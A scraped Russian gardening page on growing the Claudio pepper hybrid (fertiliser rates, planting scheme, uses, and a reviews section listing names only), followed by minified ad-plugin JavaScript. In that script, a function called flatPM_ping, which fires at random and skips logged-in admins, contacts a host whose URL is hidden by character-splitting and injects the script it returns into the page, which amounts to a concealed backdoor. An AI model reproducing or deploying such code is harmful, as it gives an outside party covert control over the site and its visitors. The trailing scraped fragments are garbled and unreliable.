Совет! Не стоит высаживать перец на то место, где до этого выращивали картофель, томаты, баклажаны.

Осенью участок хорошо перекапывают и добавляют на 1 кв. м:

  • 5 кг компоста;
  • 50 г суперфосфата;
  • 50 г сульфата калия.

Весной участок опять перекапывать и вносят 30 г аммиачной селитры на 1 кв. м перед высадкой рассады.

Схема посадки составляет 40*70 см.

Рассаду переносят в лунки, в которые предварительно добавляют по 1 ст. л. любого комплексного удобрения с содержанием фосфор, азота и калия (суперфосфат). Необходимо следить, чтобы корневая шейка находилась на уровне с грунтом. Далее лунки засыпают землей, немного уплотняют, обильно поливают тёплой водой и мульчируют торфом.

Применение

Перец сорта Клаудио можно употреблять в свежем виде, а также готовить из него различные заготовки на зиму. Благодаря своим отличным вкусовым качествам, он идеален для свежих салатов.

Посмотрите видео! Перец Клаудио. Гибрид крупный и урожайный

Отзывы кто сажал

Далее вы можете ознакомиться с отзывами огородников, которые точно знают, как выращивать перец Клаудио и какие трудности могут при этом возникнуть.

Людмила Петровна, Курская область

Виктория Тарасовна, Самарская область

Евгений Борисович, Смоленская область

Анна Николаевна, Краснодарский край

Галина Семеновна, Новгородская область

Сергей Евгеньевич, Московская область

Ирина Леонидовна, Псковская область

Владимир Викторович, Ленинградская область

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};